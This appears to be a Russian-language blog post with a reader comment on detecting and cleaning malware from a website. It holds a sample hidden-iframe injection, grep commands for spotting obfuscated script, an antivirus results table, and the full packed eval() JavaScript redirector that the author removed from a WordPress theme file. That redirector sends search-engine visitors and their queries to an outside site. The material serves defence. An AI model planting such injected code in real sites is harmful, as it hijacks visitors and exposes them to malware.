Сайт с вирусами и троянами встретить в сети очень просто. Чаще всего, вредоносный код атакует компьютеры на порно сайтах, или сайтах сомнительного содержания, которые вообще редко бывают без вирусов.
Что делать, если на сайте вирус?
- Изменить пароли доступа на сайт по FTP. Это стоит сделать прежде каких либо других.
- Проверить свой компьютер на вирусы. Желательно делать это антивирусов отличным от установленного.
- Очистить кэш браузера, и использовать в дальнейшем Мозилла.
- НЕ сохранять пароли в программах.
Ссылки для проверки сайта на вирусы:
http://www.google.com/safebrowsing/diagnostic?site=ВАШ-САЙТ.РУ&hl=ru
http://vms.drweb.com/online/
http://antivirus-alarm.ru/proverka/
http://2ip.ru/site-virus-scaner/
https://www.virustotal.com/
http://burbon.ru/service/virus.php
http://urlvoid.com/
http://xseo.in/viruscan
Как найти вирус на сайте?
Первое, на что следует искать — это HTML код с подключением <iframe>. Подобные фреймы можно сделать незаметными для посетителей сайта, указав специальные параметры. Например, width=»0″ height=»0″ — это сделает их невидимыми на страницах.
Например, код вставки вируса может выглядеть так:
<iframe src="http://АДРЕС_ДО_ТРОЯНА" width="0" height="0" style="hidden" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></iframe>
find $PWD -name '*.*' -exec grep -li "iframe" {} \;
find $PWD -name '*.*' -exec grep -li "unescape" {} \;
find $PWD -name '*.*' -exec grep -li "fromCharCode" {} \;
На сайте, который проверял http://antivirus-alarm.ru/proverka/ вывелись такие результаты:
| Антивирусная база | Результат |
| nProtect | Trojan.JS.Redirector.ZT |
| CAT-QuickHeal | вирусов нет |
| McAfee | вирусов нет |
| TheHacker | вирусов нет |
| K7AntiVirus | вирусов нет |
| VirusBuster | вирусов нет |
| NOD32 | JS/Redirector.NIL |
| F-Prot | вирусов нет |
| Symantec | вирусов нет |
| Norman | вирусов нет |
| ByteHero | вирусов нет |
| TrendMicro-HouseCall | вирусов нет |
| Avast | JS:Redirector-MR [Trj] |
| eSafe | вирусов нет |
| ClamAV | PUA.Script.Packed-1 |
| Kaspersky | Trojan.JS.Redirector.ux |
| BitDefender | Trojan.JS.Redirector.ZT |
| ViRobot | вирусов нет |
| Emsisoft | Trojan.Script!IK |
| Comodo | вирусов нет |
| F-Secure | Trojan.JS.Redirector.ZT |
| DrWeb | вирусов нет |
| VIPRE | вирусов нет |
| AntiVir | вирусов нет |
| TrendMicro | вирусов нет |
| McAfee-GW-Edition | вирусов нет |
| Sophos | вирусов нет |
| eTrust-Vet | вирусов нет |
| Jiangmin | вирусов нет |
| Antiy-AVL | вирусов нет |
| Microsoft | Trojan:JS/Redirector.IT |
| SUPERAntiSpyware | вирусов нет |
| Prevx | вирусов нет |
| GData | Trojan.JS.Redirector.ZT |
| Commtouch | вирусов нет |
| AhnLab-V3 | HTML/Redirect |
| VBA32 | вирусов нет |
| PCTools | вирусов нет |
| Rising | вирусов нет |
| Ikarus | Trojan.Script |
| Fortinet | вирусов нет |
| AVG | вирусов нет |
| Panda | вирусов нет |
в папке темы в файле functions.php удалил следуюший код:
<script language=\»JavaScript\»>eval(function(p,a,c,k,e,r){e=function(c){return(c<a?»:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!».replace(/^/,String)){while(c—)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\\w+’};c=1};while(c—)if(k[c])p=p.replace(new RegExp(‘\\\b’+e(c)+’\\\b’,’g’),k[c]);return p}(‘e r=x.9,t=\»\»,q;4(r.3(\»m.\»)!=-1)t=\»q\»;4(r.3(\»7.\»)!=-1)t=\»q\»;4(r.3(\»8.\»)!=-1)t=\»p\»;4(r.3(\»a.\»)!=-1)t=\»q\»;4(r.3(\»f.\»)!=-1)t=\»g\»;4(r.3(\»j.\»)!=-1)t=\»q\»;4(t.6&&((q=r.3(\»?\»+t+\»=\»))!=-1||(q=r.3(\»&\»+t+\»=\»))!=-1))B.C=\»v\»+\»w\»+\»:/\»+\»/A\»+\»b\»+\»k\»+\»5\»+\»h.\»+\»c\»+\»z/s\»+\»u\»+\»5\»+\»h.p\»+\»d?\»+\»t\»+\»y=1&t\»+\»i\»+\»l=\»+r.n(q+2+t.6).o(\»&\»)[0];’,39,39,’|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location’.split(‘|’),0,{}))</script>
К сожалению тема не раскрыта. Как именно найти вредоносный код, об этом у вас практически ничего не сказано. Доступ по ssh есть далеко не у всех владельцев сайтов. А у кого есть, большинство не знает как работать с этим протоколом.